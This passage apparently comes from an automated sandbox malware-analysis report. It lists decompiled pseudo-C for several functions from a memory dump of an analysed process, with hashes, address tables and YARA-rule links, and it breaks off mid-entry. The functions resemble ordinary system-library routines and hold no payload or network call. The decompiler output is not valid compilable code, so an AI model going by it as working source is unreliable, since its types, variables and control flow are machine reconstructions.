                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 771730983a4e073e9ca14a473cf9d9a4c3fbebc55ea17051b125098870e78f79
                                                                                                                                • Instruction ID: e2698d6d2aa0e67ff708be2090702a652d389ce1635fb7f988abb92b0cd5a3c4
                                                                                                                                • Opcode Fuzzy Hash: 771730983a4e073e9ca14a473cf9d9a4c3fbebc55ea17051b125098870e78f79
                                                                                                                                • Instruction Fuzzy Hash: 95218E72A00118EFDB04DF58DE81F5EB7BDFB44748F150069E908AB261D375BD129B90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F66CF0, Relevance: .1, Instructions: 74COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 80%
                                                                                                                                			E04F66CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04F07D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04F07D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4ec5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04F1F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E04F1F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04F67016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04F02400( &_v52);
								}
								_t21 = L04F02400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                                                                0x04f66cfb
                                                                                                                                0x04f66d00
                                                                                                                                0x04f66d02
                                                                                                                                0x04f66d06
                                                                                                                                0x04f66d0a
                                                                                                                                0x04f66d0e
                                                                                                                                0x04f66d19
                                                                                                                                0x04f66d2b
                                                                                                                                0x04f66d1b
                                                                                                                                0x04f66d24
                                                                                                                                0x04f66d24
                                                                                                                                0x04f66d33
                                                                                                                                0x04f66d39
                                                                                                                                0x04f66d46
                                                                                                                                0x04f66d4f
                                                                                                                                0x04f66d61
                                                                                                                                0x04f66d51
                                                                                                                                0x04f66d5a
                                                                                                                                0x04f66d5a
                                                                                                                                0x04f66d69
                                                                                                                                0x04f66d6b
                                                                                                                                0x04f66d6d
                                                                                                                                0x04f66d6f
                                                                                                                                0x04f66d6f
                                                                                                                                0x04f66d74
                                                                                                                                0x04f66d79
                                                                                                                                0x04f66d7a
                                                                                                                                0x04f66d7f
                                                                                                                                0x04f66d82
                                                                                                                                0x04f66d88
                                                                                                                                0x04f66d89
                                                                                                                                0x04f66d90
                                                                                                                                0x04f66d94
                                                                                                                                0x04f66da7
                                                                                                                                0x04f66db1
                                                                                                                                0x04f66db1
                                                                                                                                0x04f66dbb
                                                                                                                                0x04f66dbb
                                                                                                                                0x04f66d90
                                                                                                                                0x04f66d69
                                                                                                                                0x04f66d46
                                                                                                                                0x04f66dc6

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6d9ff405bd4e3d6d5e208d4b87e9a0f9a8ae1574dedba008f7fbf25880cf1393
                                                                                                                                • Instruction ID: 9fce04e6f1b56461d2206a2537da80cf1870b684ad1fc30c7f81c1f54d0f7142
                                                                                                                                • Opcode Fuzzy Hash: 6d9ff405bd4e3d6d5e208d4b87e9a0f9a8ae1574dedba008f7fbf25880cf1393
                                                                                                                                • Instruction Fuzzy Hash: D221CF729043449BE711EF69CD44B6BB7ECAF81784F0405A6F941C72A1EB34F90BD6A2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB070D, Relevance: .1, Instructions: 72COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 67%
                                                                                                                                			E04FB070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04FB07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04FAAFDE( &_v8,  &_v12);
					E04FB1293(_t38, _v28, _t60);
					if(E04F07D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04FA14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                                                                0x04fb071b
                                                                                                                                0x04fb0724
                                                                                                                                0x04fb0734
                                                                                                                                0x04fb0738
                                                                                                                                0x04fb074b
                                                                                                                                0x04fb074b
                                                                                                                                0x04fb0753
                                                                                                                                0x04fb0753
                                                                                                                                0x04fb0759
                                                                                                                                0x04fb075d
                                                                                                                                0x04fb0774
                                                                                                                                0x04fb0779
                                                                                                                                0x04fb077d
                                                                                                                                0x04fb0789
                                                                                                                                0x04fb0795
                                                                                                                                0x04fb07a7
                                                                                                                                0x04fb0797
                                                                                                                                0x04fb07a0
                                                                                                                                0x04fb07a0
                                                                                                                                0x04fb07af
                                                                                                                                0x04fb07c4
                                                                                                                                0x04fb07cd
                                                                                                                                0x04fb07cd
                                                                                                                                0x04fb07af
                                                                                                                                0x04fb07dc

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                • Instruction ID: 2ee6df1482fd01f15428c3ca8a77f375eff1acdf30bc19d176c787b719e98307
                                                                                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                • Instruction Fuzzy Hash: 44212F76704200AFD705DF28CC80AABBBA5EBC1350F148669FC948B381DB30E90ACB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F0AE73, Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 96%
                                                                                                                                			E04F0AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04F07D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04F07D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04F07D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04F07D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04F67794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                                                                0x04f0ae78
                                                                                                                                0x04f0ae7c
                                                                                                                                0x04f0ae7e
                                                                                                                                0x04f0ae81
                                                                                                                                0x04f0ae86
                                                                                                                                0x04f0ae8d
                                                                                                                                0x04f52691
                                                                                                                                0x04f0ae93
                                                                                                                                0x04f0ae93
                                                                                                                                0x04f0ae93
                                                                                                                                0x04f0ae98
                                                                                                                                0x04f0ae9d
                                                                                                                                0x04f526a2
                                                                                                                                0x04f526b4
                                                                                                                                0x04f526a4
                                                                                                                                0x04f526ad
                                                                                                                                0x04f526ad
                                                                                                                                0x04f526b9
                                                                                                                                0x00000000
                                                                                                                                0x04f526bb
                                                                                                                                0x00000000
                                                                                                                                0x04f526bb
                                                                                                                                0x04f0aea3
                                                                                                                                0x04f0aea3
                                                                                                                                0x04f0aea3
                                                                                                                                0x04f0aeaa
                                                                                                                                0x04f526c0
                                                                                                                                0x04f526c9
                                                                                                                                0x04f526c9
                                                                                                                                0x04f0aeb3
                                                                                                                                0x04f526d4
                                                                                                                                0x04f526e1
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f526e7
                                                                                                                                0x04f526ee
                                                                                                                                0x04f526f0
                                                                                                                                0x04f526f9
                                                                                                                                0x04f526f9
                                                                                                                                0x04f52702
                                                                                                                                0x04f52708
                                                                                                                                0x04f52708
                                                                                                                                0x04f5270b
                                                                                                                                0x04f5270f
                                                                                                                                0x04f52711
                                                                                                                                0x04f52711
                                                                                                                                0x04f52725
                                                                                                                                0x04f52725
                                                                                                                                0x00000000
                                                                                                                                0x04f0aeb9
                                                                                                                                0x04f0aeb9
                                                                                                                                0x04f0aebf
                                                                                                                                0x04f0aebf
                                                                                                                                0x04f0aeb3

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                                • Instruction ID: c9e9a14104890fecddb3830a6b3e5bf4876ab68a5373ee8ef1f78a37743812eb
                                                                                                                                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                                • Instruction Fuzzy Hash: 6021D732A01681DFEB15DB29C944B2677D4EF84344F0A41E1DE048B6A2E734FC43DA90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F67794, Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 82%
                                                                                                                                			E04F67794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4fd7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04F04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04F2F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04F07D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04F29AE0();
					_t24 = L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                                                                0x04f67799
                                                                                                                                0x04f6779a
                                                                                                                                0x04f6779b
                                                                                                                                0x04f677a3
                                                                                                                                0x04f677ab
                                                                                                                                0x04f677ae
                                                                                                                                0x04f677b1
                                                                                                                                0x04f677b1
                                                                                                                                0x04f677bf
                                                                                                                                0x04f677c4
                                                                                                                                0x04f677c8
                                                                                                                                0x04f677ce
                                                                                                                                0x04f677d4
                                                                                                                                0x04f677e0
                                                                                                                                0x04f677e0
                                                                                                                                0x04f677d6
                                                                                                                                0x04f677d6
                                                                                                                                0x04f677de
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f677de
                                                                                                                                0x04f677e5
                                                                                                                                0x04f677f0
                                                                                                                                0x04f677f3
                                                                                                                                0x04f677f6
                                                                                                                                0x04f677fd
                                                                                                                                0x04f67800
                                                                                                                                0x04f6780c
                                                                                                                                0x04f67818
                                                                                                                                0x04f6782b
                                                                                                                                0x04f6781a
                                                                                                                                0x04f67823
                                                                                                                                0x04f67823
                                                                                                                                0x04f67830
                                                                                                                                0x04f67831
                                                                                                                                0x04f67838
                                                                                                                                0x04f6783d
                                                                                                                                0x04f6783e
                                                                                                                                0x04f6784f
                                                                                                                                0x04f6784f
                                                                                                                                0x04f6785a

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fee6b53c490b35e702013af4466fe6ed72f36d609c962f5e87661ae3bfb74eeb
                                                                                                                                • Instruction ID: 32130b27b0c7c49e1bb6e2c5bb2767793e4461d7fa528bb802a0d420edc30c6e
                                                                                                                                • Opcode Fuzzy Hash: fee6b53c490b35e702013af4466fe6ed72f36d609c962f5e87661ae3bfb74eeb
                                                                                                                                • Instruction Fuzzy Hash: 05219D72A00604ABC725EF69DC80E6BB7E9EF88744F104569E90AC7690E634E901CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1FD9B, Relevance: .1, Instructions: 69COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 93%
                                                                                                                                			E04F1FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04EF76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04F04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                                                                0x04f1fd9b
                                                                                                                                0x04f1fda0
                                                                                                                                0x04f1fda1
                                                                                                                                0x04f1fdab
                                                                                                                                0x04f1fdad
                                                                                                                                0x04f1fdb0
                                                                                                                                0x04f1fdb8
                                                                                                                                0x04f1fe0f
                                                                                                                                0x04f1fde6
                                                                                                                                0x04f1fde9
                                                                                                                                0x04f1fdec
                                                                                                                                0x04f5c0c0
                                                                                                                                0x04f1fdfe
                                                                                                                                0x04f1fe06
                                                                                                                                0x04f1fe06
                                                                                                                                0x04f5c0c8
                                                                                                                                0x04f1fe2d
                                                                                                                                0x04f1fe2d
                                                                                                                                0x00000000
                                                                                                                                0x04f1fe2d
                                                                                                                                0x04f5c0d1
                                                                                                                                0x04f5c0e0
                                                                                                                                0x04f5c0e5
                                                                                                                                0x04f5c0e5
                                                                                                                                0x04f5c0e8
                                                                                                                                0x00000000
                                                                                                                                0x04f5c0e8
                                                                                                                                0x04f1fdf4
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1fdf6
                                                                                                                                0x04f1fdfa
                                                                                                                                0x04f1fe1a
                                                                                                                                0x04f1fe1f
                                                                                                                                0x04f1fe1f
                                                                                                                                0x04f1fdfc
                                                                                                                                0x00000000
                                                                                                                                0x04f1fdfc
                                                                                                                                0x04f1fdcc
                                                                                                                                0x04f1fdd0
                                                                                                                                0x04f1fe26
                                                                                                                                0x00000000
                                                                                                                                0x04f1fe26
                                                                                                                                0x04f1fdd8
                                                                                                                                0x04f1fddb
                                                                                                                                0x04f1fddd
                                                                                                                                0x04f1fde0
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                                • Instruction ID: d78e837cc605b583636c2b2d3a241cb948041e7d401f91e45c085f542a41531a
                                                                                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                                • Instruction Fuzzy Hash: BE219D72A40A40DFD735CF09C680E66F7E5EB94B10F25857EE94A87621E731BC02DBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EE9240, Relevance: .1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 77%
                                                                                                                                			E04EE9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4fbf708);
				E04F3D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04F295D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04F295D0();
				_t33 =  *0x4fd84c4; // 0x0
				L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4fd84c4; // 0x0
				L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4fd84c4; // 0x0
				E04F02280(L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4fd86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04F295D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04F295D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04EE9325();
					_t50 =  *0x4fd84c4; // 0x0
					return E04F3D0D1(L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                                                0x04ee9240
                                                                                                                                0x04ee9242
                                                                                                                                0x04ee9247
                                                                                                                                0x04ee924c
                                                                                                                                0x04ee924e
                                                                                                                                0x04ee9255
                                                                                                                                0x04ee9257
                                                                                                                                0x04ee925a
                                                                                                                                0x04ee925f
                                                                                                                                0x04ee925f
                                                                                                                                0x04ee9266
                                                                                                                                0x04ee9271
                                                                                                                                0x04ee9276
                                                                                                                                0x04ee9279
                                                                                                                                0x04ee927e
                                                                                                                                0x04ee9295
                                                                                                                                0x04ee929a
                                                                                                                                0x04ee92b1
                                                                                                                                0x04ee92b6
                                                                                                                                0x04ee92d7
                                                                                                                                0x04ee92dc
                                                                                                                                0x04ee92e0
                                                                                                                                0x04ee92e6
                                                                                                                                0x04ee92e8
                                                                                                                                0x04ee92ee
                                                                                                                                0x04ee9332
                                                                                                                                0x04ee9333
                                                                                                                                0x04ee9337
                                                                                                                                0x04ee9338
                                                                                                                                0x04ee933a
                                                                                                                                0x04ee933a
                                                                                                                                0x04ee933d
                                                                                                                                0x04ee9342
                                                                                                                                0x04ee9342
                                                                                                                                0x04ee9345
                                                                                                                                0x04ee9349
                                                                                                                                0x04ee934e
                                                                                                                                0x04ee9352
                                                                                                                                0x04ee9357
                                                                                                                                0x04ee92f4
                                                                                                                                0x04ee92f4
                                                                                                                                0x04ee92f6
                                                                                                                                0x04ee92f9
                                                                                                                                0x04ee9300
                                                                                                                                0x04ee9306
                                                                                                                                0x04ee9324
                                                                                                                                0x04ee9324

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: c1f20363de2b90680515dc6dfcdddb8d8e5a43a0a3c83dacd742b0a4d0595c83
                                                                                                                                • Instruction ID: b3a7bf0326e3f52078dc5c79696ad0fc8d4e7f5e7f510ca3066c0338b9b6e2a5
                                                                                                                                • Opcode Fuzzy Hash: c1f20363de2b90680515dc6dfcdddb8d8e5a43a0a3c83dacd742b0a4d0595c83
                                                                                                                                • Instruction Fuzzy Hash: 092134B1141640DFD721EF68DE00F2AB7F9EF08708F1485A8A059866A2CA34F942DB54
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1B390, Relevance: .1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 54%
                                                                                                                                			E04F1B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04F02280(_t12, 0x4fd8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04F200C2(0x4fd8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                                                                0x04f1b395
                                                                                                                                0x04f1b3a2
                                                                                                                                0x04f1b3a5
                                                                                                                                0x04f1b3aa
                                                                                                                                0x04f1b3b2
                                                                                                                                0x04f1b3ba
                                                                                                                                0x04f1b3bd
                                                                                                                                0x04f1b3c0
                                                                                                                                0x04f1b3c4
                                                                                                                                0x04f1b3c9
                                                                                                                                0x04f5a3e9
                                                                                                                                0x04f5a3ed
                                                                                                                                0x04f5a3f0
                                                                                                                                0x04f5a3ff
                                                                                                                                0x04f5a403
                                                                                                                                0x04f5a409
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5a40b
                                                                                                                                0x04f5a40b
                                                                                                                                0x04f5a40f
                                                                                                                                0x04f5a415
                                                                                                                                0x04f5a423
                                                                                                                                0x04f5a423
                                                                                                                                0x04f5a415
                                                                                                                                0x04f1b3d1
                                                                                                                                0x04f1b3e8
                                                                                                                                0x04f1b3e8
                                                                                                                                0x04f1b3d9

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
